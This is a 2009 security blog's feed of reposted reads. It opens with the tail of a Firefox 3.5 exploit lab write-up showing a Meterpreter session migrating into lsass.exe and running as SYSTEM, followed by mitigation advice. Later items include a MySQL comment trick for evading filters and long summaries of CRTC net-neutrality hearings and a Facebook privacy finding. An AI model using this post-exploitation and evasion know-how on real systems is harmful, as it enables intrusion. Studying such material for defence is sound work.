meterpreter > run migrate[*] Migrating to lsass.exe...[*] Current server process: firefox.exe (1800)[*] New server process: lsass.exe (684)meterpreter > sysinfoComputer: WINXPLAB01OS : Windows XP (Build 2600, Service Pack 2).meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter >
This exploit differs from the latest ones made public for IE ActiveX controls since this exploit may require some additional steps to be conducted by the target system to be able to get a shell back. This exploit only works at the moment of this writing for Windows XP SP0 – SP3 with Firefox 3.5.0 and in testing it was found that it did not worked 100% of the time since several tries where needed on some of the labs machines while others worked on the first try.
A way to mitigate this attack would be to change in Firefox by entering in the address bar the about:config and changing the parameter for javascript.options.jit.content or simply using the NoScript add-on. The mitigation on a large enterprise will be difficult do to that a GPO (Group Policy Object) can not be pushed to client and logging script is one of the alternatives that will have to be used to mitigate the risk.
Firefox 3.5 (Font tags) Remote Buffer Overflow actively being exploited.
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
After doing my usual digging through my list of malicious urls for the morning I came across a site that is actively exploiting the new Firefox vuln using the exploit written by Simon Berry-Byrne. It uses a standard heapspray technique for code exec. The site that is hosting this exploit appears to be a legitimate site that was compromised. It looks like a RFI may have been used to drop the file on the site. The page located at /img/icons/f.htm is a direct copy of the milw0rm code. They did not even bother to remove any of the comments. A simple download-and-execute payload is used.
South Korea to Develop Electromagnetic Pulse Bomb by 2014
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
The South Korean military will have an electromagnetic pulse (EMP) bomb in five years that is capable of crippling an enemy’s command-and-control, communications and defense radar systems.
The Next Hacking Frontier: Your Brain?
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Hackers who commandeer your computer are bad enough but as neural devices become more complicated — and go wireless — some scientists say the risks of “brain hacking” should be taken seriously.
Report of Findings with respect to Facebook
July 16th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
(from our backgrounder)
The Office of the Privacy Commissioner of Canada has completed an in-depth investigation into a wide-ranging complaint about the privacy practices and policies of Facebook, a social networking website. The complaint was filed by the Canadian Internet Policy and Public Interest Clinic (CIPPIC).
The investigation was conducted under PIPEDA, the Personal Information Protection and Electronic Documents Act, which is the federal private-sector privacy law.
Our investigation concluded that four aspects of the complaint were well founded. Another four were well founded but considered to be resolved after Facebook agreed to make specific changes to its policies or practices. The final four issues raised by the complaint were dismissed as not well founded.
Here are examples from each of the three categories of our findings.
Well-founded allegation of the complaint: Third-party applications
One key allegation of the complaint that we upheld as well founded related to Facebook’s disclosure of personal information to third-party developers who create applications, such as games, quizzes and classified ads, that run on the Facebook platform. There are more than 950,000 application developers in some 180 countries.
When users add an application, they consent to giving the application’s developer access to some of their personal information, as well as that of their “friends.” Moreover, the only way that users can refuse to share personal information when their friends add applications is by opting completely out of all applications, or blocking specific applications.
Based on our investigation, we recommended that Facebook implement technological measures to restrict application developers’ access only to the user information essential to run a specific application. We also called on Facebook to ensure that users are informed of the specific information that an application requires, and what the purpose is.
We further recommended that users signing up for an application be asked for express consent to provide their personal information to third-party developers. Measures are needed to prohibit all disclosure of the personal information of users who are not themselves adding an application.
Facebook has not agreed to the recommendations.
Well-founded and Resolved allegation of the complaint: Facebook advertising
The complainant alleged that Facebook was not making a reasonable effort to notify users clearly that their personal information is used for advertising purposes.
Our Office examined the two types of ads on Facebook that use personal information – “Facebook ads,” which are targeted to demographic profiles or key words in a user’s profile, and “social ads,” which are triggered by actions such as becoming a fan of a page or joining a particular group.
Social ads are inherently intrusive because they use peoples’ actions, thumbnail photos and names to promote products and services. The ads give the appearance that a user is endorsing a particular product. Users can, however, opt out of this type of ads.
On the other hand, users cannot opt out of Facebook ads. But, because only users can see the ads being targeted at them, we considered them to be less invasive.
We accepted that, as a free service to users, Facebook needs to generate revenue, and that most Facebook users reasonably expect to receive advertisements. However, in light of the prominent role of advertising on the site, we recommended that Facebook explain the role of advertising more fully in its Privacy Policy, and inform users that their profile information is used for targeted advertising purposes.
Facebook agreed in principle to describe advertising more clearly and to configure its systems to allow users to more easily find information about advertising.
Not Well-founded allegation of the complaint: Deception and misrepresentation
The complainant alleged that Facebook was misrepresenting itself by claiming to be purely a social networking site when, in fact, it was engaged in other activities, such as advertising and third-party applications, and did not clearly explain this involvement. The complainant also alleged that Facebook was misrepresenting users’ level of control over their personal information.
We found no evidence that Facebook was willfully misleading or deceiving users about the purposes for which it collects information, or that it is obtaining consent through deception.
The Road Ahead
The Privacy Commissioner has given Facebook 30 days to comply with any unresolved recommendations. During that time, our Office will continue to work with the company to address any outstanding concerns.
Under PIPEDA, the Privacy Commissioner can apply to the Federal Court of Canada to have her recommendations enforced.
Various PHP and MySQL pitfalls
July 14th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
This is a short post, to summarize some of the issues I see with PHP code and the use of MySQL. Not too many people know about these pitfalls and they are given rise to some of the more subtle security issues:
1 – “SQL Overflow”
If a value you insert into a column is too large, it is truncated silently. This can lead to security issues if you don’t validate that the submitted string is of the right length.
2 – “Trailing White Space Ambiguity”
Trailing white spaces are removed by MySQL silently. For example, these two queries retrieve the same result:
select role from user where username='Admin'; select role from user where username='Admin '; (note the space at the end).
3 – Unbalanced comments
Older versions of MySQL allow /* to be used unbalanced. For example,
select now() /* test
will work. Newer versions of MySQL require balanced comments (unbalanced was always “illegal” according to the documentation
4 – php ‘rand()’ function returns bad results
If the argument exceeds the maximum integer, you will get not-so random numbers back. This one depends a bit on the version of PHP you are using. But you will not get an error. Instead, you will get negative numbers, or numbers that are not random (e.g. only last couple of digits change).
5 – MySQL “–” comments require a white space
In order to use “–” as a comment, it has to be followed by a whitespace.
select now() –test will fail
select now() — test will work
You don’t have to use a space. A tab will work just fine and evades some filters.
Got some to add? Use the comments 
1984: Changing Perceptions of Surveillance
July 14th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
What if any government had the opportunity to rewrite history, to paste over unflattering narratives and emphasize its purported strengths? I know, unfortunately that isn’t a rhetorical question.
What if 1984, George Orwell’s classic novel about the tyranny of oppression and never-ending surveillance, had been seized and rewritten to promote the work of Oceania, the government in power?
That’s the premise behind Alexander Charchar’s delicate reworking of the book’s cover art.
“ … That which is hard to ignore, is the fact that it’s ugly. Horribly ugly. It’s centered text to the left, with no thought of kerning or, even though an attempt has been made, to have the lines of text balanced. Perfect for a world where such detail in the arts is ignored and, in a sense, repulsed by those with political muscle …”
Charchar felt that previous cover art was intended to reflect the design sensibilities of the decade (the book has been through so many reprintings, there are dozens of past covers ) rather than the anti-totalitarian message Orwell intended to drive into the reader’s heart and mind.
How would a government like that of Oceania approach its communications with its citizens? As a rough and functional necessity – much like the brutalist approach to architecture?
That certainly strikes a chord if you lived through the second half of the twentieth century, when totalitarian governments in Europe and Asia largely emphasized homogeneity and efficiency over creativity.
It’s also a contrast with the reality we face today, where governments continually experiment with nuanced and targeted messages designed to build support for increased security and ever more invasive surveillance measures.
Quick Stats Around the US-KR DDoS Attacks
July 10th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
It’s been a busy week here in the office, between investigating, helping customers and the operator community, investigating some more, and of course talking to the press. Here’s some quick stats I have been running this afternoon on the attack using ATLAS data. This data comes from our monitors used in the backbone monitoring live traffic rates and actual DDoS attacks. We didn’t see all of the attacks against all of the victims (some 47 unique victims counted by ShadowServer by analyzing all of the configuration files) but this, we think, may be representative of the attacks.
The peak attack size we measured was about 182Mbps, or about 428Kpps. The average size of an attack was about 39Mbps. Earlier investigations a couple of days ago showed smaller attacks but I would still classify these as “garden variety” in their intensity (most things below a couple hundred Mbps are pretty easily filtered).
The attacks lasted between a few minutes and 10 hours, with an average duration of about 3 hours.
In almost all cases these were low level anomalies to the devices monitoring the traffic. The bps and pps (packet per second) rates were barely above threshholds in many cases.
As such our original analysis made a couple of days ago that this was a pretty modest sized attack stands.
No comment on attribution at this point, it’s way too early to tell. Today is the self destruct day, too, for the bots. The “flash.gif” EXE they may have downloaded will gzip up their files and delete the MBR: poof.
Still no definitive idea on how this thing infected its userbase so quickly. 200,000 bots or so according to researchers.
Around the net:
- An analysis by an independent security lab: 77DDoS.pdf
- Korean/U.S. DDoS Attacks – Perplexing, Disruptive, and Destructive from the ShadowServer foundation
Homomorphic Encryption Breakthrough
July 9th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Last month, IBM made some pretty brash claims about homomorphic encryption and the future of security. I hate to be the one to throw cold water on the whole thing — as cool as the new discovery is — but it’s important to separate the theoretical from the practical. Homomorphic cryptosystems are ones where mathematical operations on the ciphertext have…
CRTC Network Management Hearings, Day Three: IFTA & CFTPA, CCD & ARCH, ACTRA, MTS Allstream
July 9th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Day three of the CRTC's network management hearings brought in the views of several additional stakeholders along with the first large telco of the week. Witnesses included the Independent Film and Television Alliance, the Canadian Film and Television Production Association, Council for Canadians with Disabilities, the ARCH Disability Law Centre ACTRA, and MTS Allstream.
While all the creator and producer groups expressed support for net neutrality, it was their position on BitTorrent that was particularly noteworthy. Perhaps heralding an end to the demonization of file sharing, ACTRA emphasized that it wants to compete with illegal downloading and that the best way to do that is to ensure that its members can use applications like BitTorrent to distribute their content. In other words, copyright alone won't address their concerns (they added the need for copyright reform) as network management practices that create a level playing field are essential. Meanwhile, the independent producers emphasized the economic potential of BitTorrent-based distribution. Moreover, ACTRA argued that it was not the role of ISPs to determine the legality of content on their networks. That position is a far cry from what groups like CRIA would like to see happen.
The other big story of the day was MTS Allstream arguing that dominant carriers should never be permitted throttle wholesale services (ie. they argue that any throttling should only occur at the retail level). This led to repeated discussion about the nature of wholesale services (referred to as GAS or Gateway Access Service) with MTS explaining that wholesale service is not like buying Internet access as a retail customer (it was described as akin to a private virtual network). For that reason, there is no valid claim that congestion concerns are the basis for throttling wholesale services (left unsaid is why a company like Bell would throttle – competition from the very ISPs to whom it supplies wholesale access). The discussion was stunning since it left the distinct impression that the Commission did not fully understand what was at issue in the CAIP throttling case.
There was two other exchanges involving Commissioner Len Katz worthy of note. The first was a question in which he suggested that Bell and Rogers do not have a dominant position in Ontario, something that will be news to the overwhelming majority of broadband subscribers in the province. The second was the recognition that prioritization of content is effectively the same thing as throttling of content since the effect in both instances is to place some content on a fast lane and other content on a slow one.
These issues may arise again tomorrow when CAIP appears. Today's summary was compiled by Yael Wexler, a law student at the University of Ottawa. Other coverage available from the National Post liveblog, CBC.ca, and the cippic twitter feed (or mine for MTS).
CRTC Net neutrality Hearings – July 8, 2009
CFTPA and IFTA
Summary:
1. Independent producers are important content creators in Canada and the US.
2. The Internet is a necessary tool – sometimes the only tool – for financing, producing and distributing independently produced works.
3. Industry consolidation – the vertical integration of ISPs with production companies – threatens independently produced works with slower distribution in favour of preferential treatment for allied productions.
4. Network congestion must be more clearly defined.
5. Increasing capacity is the best way to ensure broadband service meets demand
6. Traffic management practices must be disclosed and transparent to the customer.
7. Urge the CRTC to reconsider whether ISPs should be immune from s. 27(2) of the Act
Opening remarks:
John Barrack, National Executive Vice-President Counsel, CFTPA:
Come before the CRTC to share the perspective of independent producers – the content creators – at home and abroad on the worldwide issue of ISP traffic control. Since CAIP v. Bell, the CRTC has taken initiative to develop a unified policy on this matter. The Alliance asks that the Internet remain a forum of direct, unfettered access to audiences for independent producers, via wireline or wireless. The Internet is the most efficient distribution method and is necessary for the very viability of Canadian independent production. ISP traffic management practices (ITMPs) create insurmountable barriers for independent producers to monetize their productions. Moreover, ITMPs hinder the innovation of new content-creating (new media) business models and practices. Another concern is that allowing ISPs ITMPs to go unfettered will result in a two-tiered Internet, whereby the big ISPs that are vertically integrated with production companies will give their productions preferential treatment at the expense of independently produced works.
Susan Cleary, vice President and General Counsel of IFTA
Ms. Cleary highlighted the situation in the United States, having first-hand knowledge of the issues there in her role at IFTA. IFTA puts the focus on independent content creators and the vast potential of the online space to finance, produce and distribute content. In many cases, the Internet is the only way for independent producers to work and recover revenues lost in tv, theatrical and DVD sales. The problem for independent producers is industry consolidation – the ISPs are also the cable, radio, newspaper and production company owners. In 2003 only 18% of US primetime was independently produced. Industry consolidation risks preferential treatment and carriage under guise of network management of congestion without a clear idea justification as what that is. ITMPs such as throttling and packet forging are likely to contravene s. 27(2) and 36. These offer a reasonableness standard for ITMPs, not targeting of specific applications given that they represent the only way to access non-conglomerate productions.
Brad Fox – Producer, Strada Films and Rocket Ace Moving Pictures
New media content-creators can't run the costs and risks required by an 'after-the-fact, case-by-case' basis regulatory approach to traffic throttling. Discriminatory ITMPs are being erroneously portrayed by the ISPs as being in the public's interest when they are not at all. The CRTC should use its powers under s.24 to prohibit discriminatory ITMPs. This would promote competition in the ISP industry and set a straightforward standard for acceptable ITMPs.
Dan Hawes – President and Founder of March Entertainment
There are preferred means of managing traffic. First, increasing capacity is the best way to ensure broadband service meets demand. An inquiry to how US federal spending on national broadband infrastructure has worked leaves Canadians with broadband envy. The CRTC's call for national digital media strategy can help in this regard. “One of the pillars of any such strategy must be to reclaim Canada's place as a legitimate leader in broadband speed, access, and affordability.” A second option is to increase last-mile capacity and a third is deploying content delivery networks. There are others; they all indicate that there are other solutions to traffic management other than throttling.
Reynolds Mastin – Associate Counsel, CFTPA
Traffic mgmt practices must be disclosed and transparent to the customer. The CRTC should impose notification requirements on ISPs so that consumers can have greater understanding of their Internet service and give them greater control to the service they pay for. We support Score Media's proposal of disclosing the proportion of physical access link that is dedicated to Internet access in order to see if there is ‘fast tracking' of types of files. Another proposal is for symmetrical regulation of wireless and wireline services, by reconsidering whether ISPs should be immune from s. 27(2) of the Act and including an undue preference/discrimination clause in the New Media Broadcasting Undertakings. CFTPA continues to advocate for the inclusion of ISPs under “broadcast undertakings” and therefore under the purview of the Broadcasting Act.
Questions:
Chair -
The problem with the Alliance's submission is that the CRTC has laws against undue preference. On what basis can we as regulators believe that “throttling” will be a future business strategy ISPs employ knowing it is against the law? I'm not convinced that a condition of license would have better adherence than the same as a provision of the law
Alliance (Reynolds) -
Knowing something is against the law is different from abiding by it, or hedging your bets that a small time producer isn't going to fight a big player ISP on the issue. There is potential for throttling to become the dominant mode of ITMP. If it becomes an established practice, plus the exigencies of filing a complaint under 27(2), could have a damaging impact on independent and emerging producers' ability to get their product to market. The best way to avoid this practice is to include a rule against it as a condition of the license for an ISP to operate. The difference between having it be a law and a condition of service is the difference between ‘may' and ‘must.'
Chair –
Is it a lie that P2P takes more bandwidth than direct access sites?
Alliance
Comcast decided to throttle all Bit torrent regardless of the content, which they lied about, and then paid people to sit in public hearings about it to contravene the democratic process. The FCC was enraged, and did not fine them, but made them to disclose their throttling practices.
Commissioner Timothy Denton –
How did you come up with the three part test?
Reynolds –
3 stage analysis is common among the people testifying in this proceeding. Whether the practice is reasonable and in the public interest, and it provides a clear lens for reaching a decision.
Denton –
Congestion is the basic problem carriers are trying to deal with?
(Alliance) Barrack –
When an ISP is building up its network, it's economically viable to build it up to full capacity. But when you under-provision, you run the risk of congestion. We recognize the need for flexibility in ISP management, except in this one respect of throttling certain types of carriage.
Denton –
Will this allow for the propagation of obnoxious practices by those who would use the public rules to get around them?
Alliance (John) –
Transparency is the answer. We're not suggesting that publishing is the solution, but it would allow for the opportunity for everyone to know what's going on.
Alliance (Reynolds) –
We need to have an informed consumer. As a general principle, when it comes down to how something is being trafficked, the maximum amount of information disclosed is optimal.
Denton -
A complaints-driven process may be necessary but it might give undue weight to one side.
Alliance (John) –
It's extremely useful to hear the voices of the independent producers who can't afford to carry through the entire legal process. We can learn some of the lessons about solutions from other self-regulating models.
Commissioner Leonard Katz –
Risk of independent producers being squeezed out by ISP gatekeepers vertical integration. What if businesses engaged in transactions between non-aligned producers for preferential treatment, how would that not be any different than vertical integration? Would you be opposed to that?
Alliance (Cleary) –
Independent producers can't find aggregators interested in those kind of transactions, they‘re not interested in one-off productions or even medium sized catalogues. Hulu is the closest we've come to that type of arrangement.
Katz –
So you're issue is broader, you're interested in the way we regard independent productions as people and as an industry?
Alliance (Barrack) –
Yes, but we're most concerned about this democratic forum of the Internet. Wireless devices are indistinguishable.
Katz –
But you acknowledge why wireless has had a more flexible environment.
Alliance (Fox) –
A significant proportion of our audience that we hadn't anticipated are commuters, who use wireless.
Commissioner Suzanne Lamare –
The last mile in wireless access is spectrum management, which is part of the infrastructure. In order to manage traffic, building on infrastructure is a good way to go. But it's much easier to unroll cable than spectrum. So when you talk about the greatest degree possible of symmetrical regulation of wireline and wireless, the regulations aren't the same b/c they have different capacities.
Alliance (Reynolds) -
By maintaining scarcity, it creates content management issues and veils it as capacity issues. Scarcity could be used to the advantage of independent producers.
Lamare -
Is it your opinion that P2P is the way for independent producers to monetize their work?
Alliance (Cleary) -
P2P doesn't equal piracy. You can monetize it, and you don't have to go through an aggregator. We don't advocate it industrially because the practices aren't there yet for great monetizing, but it has potential. When people talk about P2P they think Bit torrent, which sometimes has a negative framing as being unprofitable.
Council of Canadians with Disabilities and ARCH Disability Law Centre (ARCH)
Summary:
1. People with disabilities rely on the Internet to improve their quality of life.
2. Traffic management practices must not be directly or indirectly discriminatory, and should not force people with disabilities to forego on their privacy.
3. ARCH presents its own three-step approach to s.36 disputes.
4. The advantageous programs on the Internet and inventive ways of combining programs are too many to count. Therefore a whitelist approach to obtaining special exemptions or recourse for traffic control of necessary services for disabled people is impractical.
Opening remarks:
We advocate and represent the expansion of the world of accessible technology and software applications. We recommend that the CRTC establish clear guidelines for s.36 against controlling content carriage. However, ARCH welcomes the initiatives only if the guidelines directly make provisions for accessibility that is their legal obligation, just as it is in privacy considerations. We hope the result will provide accessibility without needing the commission's specific direction every step of the way or after-the-fact. ARCH suggests its own three part test for determinations under s.36, but that is different than the Oakes-like test the Open Internet Coalition suggested yesterday. However, ARCH would hold on creating a test for s. 27. If the Oakes-like test is applied to.s27 the CRTC risks undoing years of s.27 jurisprudence.
1. Consideration of whether ITMP is caught under s.36
2. Determination of whether the ITMP practice is contrary to law. This is different from the Oakes test. You are asked to determine if there is a contravention of s.36 by asking, does it amount to unjust discrimination and against the law?
Assessment must be made
3. The practice can be saved if it's found to be neutral or a positive intervention. Then the min impairment test may apply (as suggested by the OIC).
Expert Dr. Gregg Vanderheiden:
People with disabilities are now enjoying a greater lifestyle due to the many services of the Internet. The captioning of non-captioned movies by crowd sourcing, availability of film and entertainment outside of the regular channels of commerce for people with intellectual or social disabilities are just some examples of how the Internet can be used advantageously for disabled people. We're looking for a level playing field, where people with disabilities can use programs without needing to register them as ‘special' or name themselves.
Traffic management needs to be non-discriminatory. ISPS that require that consumers use specific programs rather than those of their choosing precluded people w/ disabilities from finding the programs that are best for their circumstances. Users must be free to use any combination of programs -whether it's preferred by the ISP or not – so that they can use the Internet freely and to better their lives like everyone else.
Whitelisting is not a solution – it would be impractical because of the tailoring to individual's needs. Also, it's not that these people are using alternative programs, it's that they're using mainstream programs in a different ways in order to accommodate their needs. Whitelisting also can be used to target people for marketing, or discriminated against for employment, insurance purposes, which the individuals do not want.
People with disabilities do not require significantly larger bandwidth, but it may be needed in some areas. For ex: phone calls, lower bandwidth for talking than for video with sign language, so it would require higher bandwidth. However, both of these are nothing compared to an HD movie. But if an ISP decides that the audio is important but not the video, it affects people with disabilities. Disclosure of ITMPs is critical for people with disabilities. Accordingly, the CRTC must not take a wait and see approach and trouble shoot problems only after occur.
Questions:
Chair –
You're saying that when private information exists, the ISPs will use it in wrong ways, for marketing for instance. But there is no grounding for an assumption that the ISP will give out private info to marketers about people with disabilities.
ARCH –
Well, when things are vertically integrated, like they are in the US, the ISPs can misuse their customer information in a manner that violated privacy. ID fraud happens all the time – once you're in databases with specific personal info is out there, it is out there and you're vulnerable to targeting. There is information harvesting done from sources of information. Our concern is with whitelisting. For the ISP to take that information for service provision purposes, the ISP is doing more than just being a pipeline, it advertises and directs users to a server with advertising. It is a common practice for ISPs to direct specific advertising.
Commissioner Leonard Katz -
Self identification levels the playing field and helps people with disabilities. But you're saying that whitelisting won't work. So what will work?
ARCH – -
If barriers to accessibility on the Internet are broken down, and the creation of software applications continues, then we'll get to a place where one won't need to self identify as disabled. If the CRTC does this right, people won't need to declare and forego on their privacy. We're not saying that if you want a discount, you shouldn't have to self identify, but just for disabled people to get the regular service, at the regular price, shouldn't demand self-identification.
Katz -
If the CRTC was going to look into getting special rates for people with disabilities, how much that would cost?
ARCH -
The amount is minimal because for instance, the cost of having captions doesn't increase even if bandwidth does, it's a standard price. The Internet provides the option of not needing extra costs like other telecoms need. The Internet gives us the option for multiple types of communication at once; if we are able to use the Internet without barriers, there is the potential for no extra costs and time for people with disabilities.
Alliance of Canadian Cinema, Television and Radio Artists (ACTRA)
Summary:
1. ISPs giving undue preference to their content threatens the content creators' ability to reach audiences
2. Traffic throttling is an abuse of power by the ISPs
3. ITMPs are against the Telecommunications Act and moreover, ISPs should be governed by the Broadcasting Act.
4. ITMPs should be a temporary solution, the need for which should be publicly justified as it happens by the ISPs
Opening remarks
Ferne Downey – National President
Canadian artists do not want the CRTC to hand over the keys of the Internet to Canadian ISPs. We help create the content, and so we're worried about Internet traffic management. More Canadians are using the Internet to access our work. About 70% of Canadian Internet usage is for AV files, and the Internet is helping us to compete in local and international markets.
Two specific concerns:
1. The risk of ISPs giving undue preference to content they own: The ability of the Internet to provide open access is threatened if ISPs can give preference to their own content.
2. The potential of ISPs to slow down Internet traffic – to abuse their power as gatekeepers: Vertical media integration is a threat to diversity and the same is true for ISPs.
Stephen Waddell – National Executive Director
P2P like BitTorrent (BT) receive undue criticism by the ISPs as a scapegoat to traffic control. BT is the standard for distributing large files, for legitimate copyright holders (even CBC used it to distribute “Canada's Next Great PM”). ACTRA is not endorsing illegal file sharing, but it's not the job of ISPs to determine the legality of files going through their networks. Therefore, ITMP is against the Telecommunications Act. Moreover, we ask that the CRTC reconsider its jurisdiction over ISPs under the Broadcasting Act.
Traffic management should be only to avoid serious problem and a temporary solution to them.
The CRTC should regulate it according to the following principles:
1. Onus should be on ISPs to prove they need to manage traffic to manage the integrity of the system
2. ISPs must fully disclose what types of traffic mgmt practices they are using and when
3. There should be no discrimination as between wholesale and retail clients
4. There should be no discrimination as between end users
5. There should be no differential treatment between different applications of content
6. The only exceptions to these principles would be the ability for ISPs to give preferential access to any emergency service authorized by public authorities.
Questions:
Chair –
This is a utopian picture you're painting. The fact is that there's more usage than their pipes, just like cars and we have to make regulations and discriminate fairly. So how can you come here and say that there should be no throttling or controlling? Presumably, ISPs are doing the best they can, after all, they're business people who want to satisfy their customers. We clearly have more demand than capacity.
ACTRA (Waddell answered all the questions) –
It is utopian indeed. ISPs who are making significant profits should reinvest in their own system, their own infrastructure. ACTRA had no hard evidence to present to the Chair when he asked for evidence of self-preferences occurring contrary to the law.
Chair –
In terms of p2p, is your industry a heavier user of p2p than others? Will ITMP hurt Canadian film industry harder than anybody else?
ACTRA -
Yes. Since the Canadian AV industry relies on P2P heavily.
MTS Allstream
Summary:
1. Competition in the market should be promoted because that would obviate the need for regulation or traffic controlling
2. ITMPs should never be imposed on a wholesaler from the dominant carrier. ITMPs should only be in a retail context.
3. The CRTC should implement a case-by-case approach to assessing and justifying ITMPs.
Opening remarks:
Theresa Griffin-Muir – VP, Regulatory Affairs
Kelvin Shepherd- President of the consumer market division
Paul Frizado – Chief Information and Technology Officer
Principles:
1. Competition in the market should be promoted b/c it has a direct impact on the need regulation. The UK example illustrates our point that the more competition, the less need for Internet neutrality regulation, like in the UK. Each ISP can decide how best to manage its own practice and consumers can choose among them.
2. No ITMPs other than normal network management should ever be imposed by a dominant carrier on wholesale access customers. Wholesale access customers should be able to decide their own practices subject only to the CRTC, and if the dominant carrier oversteps their boundaries, the CRTC should step in. Bell's contention that they can't identify if the traffic is being controlled by their users or a wholesalers is a red herring and isn't true.
3. The CRTC should take a pragmatic, case-by-case approach to assessing the use of ITMPs. Not every control will be problematic. For example, with spamming, ITMPs are considered reasonable. The reasonableness of other measures might be judged by assessing whether such arrangements are applied to all content providers.
Paul Frizado –
How should ISPs deal with congestion? Regardless of the view on traffic, the best approach to network management is the same:
1. Network planning and engineering
2. Compliance with laws of general application
3. Measures that are agnostic in the their treatment of content
4. ‘CAP' based measures – content application protocol based on latency of an application, blocking, expediting, throttling, Deep packet inspection (DPI).
Are CAP measures necessary? Yes, in some cases. The debate around DPI has become inflammatory for nothing. It's just one tool among many for a larger network management strategy, and the large ISPs have been saying this. It would be a mistake to attempt to regulate Internet technology. The solution is a marketplace where there is enough competition to provide their users differential retail options which would mitigate the issues around net neutrality and customer satisfaction.
Questions:
Chair –
You explain that traffic shaping should only apply in the retail, not wholesale, context. Won't you get congestion then? Don't you need wholesale ITMP?
MTS (Frizado) –
Once it's sold to a wholesaler, it's out of the dominant carrier's network. We're not buying Internet access like a retailer. Bell's diagram shows that they can identify the different traffic, even prior to DPI equipment was invented.
Chair –
Are there economic decisions that motivate Bell or a dominant carrier to traffic control usage not on their networks?
MTS -
Not that we know.
Commissioner Lamarre –
In category 1, do you really mean infrastructure building?
MTS (Frizado) –
Yes. The one exception is some types of filtering like anti-virus and measures to prevent denial of service attacks are considered category 1.
Lamarre
Do you demonstrate to your customers the due diligence you took in determining that category 1 techniques have been applied before others?
MTS (Shepherd) –
Category 3 measures are legitimate starting points, and where services are defined around the speed of the Internet, you start with cat. 1, but cat. 3 and 4 come into play when you want to increase the quality of service being offered to customers. So they can be employed to ensure the performance and the network to end users. So the answer isn't to apply cat 1 techniques first all the time, because cat. 3 and 4 do play an important part.
Lamarre –
Do you really need to go to cat. 4 prioritization ever?
MTS (Frizado) –
Yes for reasonable quality of service. It's not always possible to anticipate traffic surges on the network, like the Michael Jackson funeral. Traffic management was necessary because it's unpredictable. Predictable issues on the network warrant the cat. 1.
Lamarre –
In justifying a discriminatory infringement of 27(2), you mentioned that the consent from the user is an element that could help the CRTC to determine whether or not the measure was just. How do you reconcile these? Being an informed consumer is one thing, but whether or not the consumer has been informed and even consented doesn't make it just. Our market isn't such that if I have a contract for three years, and you disclose something to me about network management and I'm faced with a choice of breaking the contract, at a cost, and finding another network, at a cost, there's nothing just about it. We don't have a market with so much choice and ease of movement between them.
MTS (Griffin-Muir ) –
Once you've transparently disclosed the practice and the customer has consented (as against another ISP who doesn't disclose) then it is just. We advocate for more competition in the market. Consent is only one factor, as is the degree of choice. There's legislation around privacy and we would have to be compliant with it and couldn't force a customer into consent simply because they have no other choice of ISP. Explicit consent for marketing, let's say, doesn't seem problematic to us.
Lamarre –
Dominant, as in “dominant supplier,” is a relative term. For instance, MTS is the dominant player in Manitoba. So when you're on the dominant side of the coin, do you agree to act accordingly to the rules you've put forward today?
MTS (Griffin-Muir) –
Yes.
Commissioner Katz –
Can you tell us whether there are ITMP employed by British Telecom. All the competition is on a retail basis, buying space from British Telecom.
MTS (Griffin-Muir) –
British Telecom is on a retail basis; it doesn't do ITMP on a wholesale basis.
Katz -
Can you clarify what you mean by exclusive content to end users?
MTS (Shepherd) -
There are customers who want quality of service agreements for their service which is possible to get into. If you throttle everybody else for someone, as opposed creating agreements, there is a difference in what you're doing. If it's exclusive, there's potentially a discriminatory element that may exist. You have to assess whether the arrangement is being offered to all application providers, the competitiveness in the market. This is an emerging area and it's not something that has been implemented in the market yet. Offering those applications might require a performance in capacity more than what is available.
Commissioner Candice Molnar –
If there is no traffic management on the wholesale service, as the wholesale customer, can you provide guarantees that the GAS customer would have no impact on the underlying network, even if all cat. 2/3 was pulled off of that service. If all traffic mgmt was removed from GAS as a wholesale customer of that product, you can guarantee the incumbent that their service wouldn't be affected.
Shepherd –
Yes. Unaffected. Requires that the services you're using have the capacity. Congestion hits where multiple slams hit the Internet access piece.
Molnar –
Are there any concerns particular for the business market which you serve? Ex: SME's use the Internet for debit cards in rural areas, lottery terminals.
MTS (Griffin-Muir)-
No, there's nothing specific. SME's look very much like consumers in the applications they're using. Typically, large businesses aren't using the public Internet for large applications.
Commissioner Denton –
You're saying it's on the retail service provider to engage in traffic management? Yesterday they were talking about the need between the retailer to signal the wholesaler on its traffic management.
MTS (Frizado) –
That was to indicate that congestion is going on. That's a plan for the future, but not something now.
Denton –
How is your four-part classification to be implemented, if the CRTC were to accept the proposals?
MTS (Griffin-Muir) -
If you accept that beyond cat.1 generally speaking there is no need to go further, if there is sufficient competition in the retail industry, our suggested measures could be adopted. Anything beyond that would go to the CRTC if it were allegedly discriminatory. But the CRTC shouldn't be telling us that we can't use certain types of tech like DPI.
Denton –
The complaint is that smaller players can't keep coming to the CRTC to deal with issues. So in order to do something preventative, what would you do? We want to know about how you would implement your own suggestions.
MTS (Griffin-Muir) -
We would still have it be case by case dispute resolution, but we will submit a more detailed plan in the final submissions.
TTC Security Theatre
July 7th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
Sometimes I find my giggles in plain sight. Today I picked up my subway pass for the month. The Toronto Transit Commission has added some “features” to make the cards more secure.
I find the sticker amusing as hell.
The TTC had this to say on their website on June 17…
From TTC.ca:
The Toronto Transit Commission is introducing new security features to its Metropass, Weekly Pass and GTA Weekly Pass in an effort to thwart an increase in counterfeiting, starting in July.
One of the added features is an activation sticker that must be removed before it can be used as valid fare on the TTC.
When the sticker is removed, a thin film is left behind on the pass where the sticker was located. Customers who have already received their July pass have noticed this film and have inquired about its presence and whether or not it should be removed. The film should NOT be removed. Doing so leaves a glue residue that gathers dirt and other particles which will then partially obscure the hologram that has been added to passes to prevent counterfeiting.
A hologram that is meant to prevent counterfeiting? They should really do their homework (note: The Wired story is from 2007).
As for the “activation” sticker; the card works just fine without it. Just saying.
High Crimes Using Low-Tech Attacks
July 7th, 2009. Published under My Recent Reads. No Comments.
pulled from Google Reader (click on title for original post)
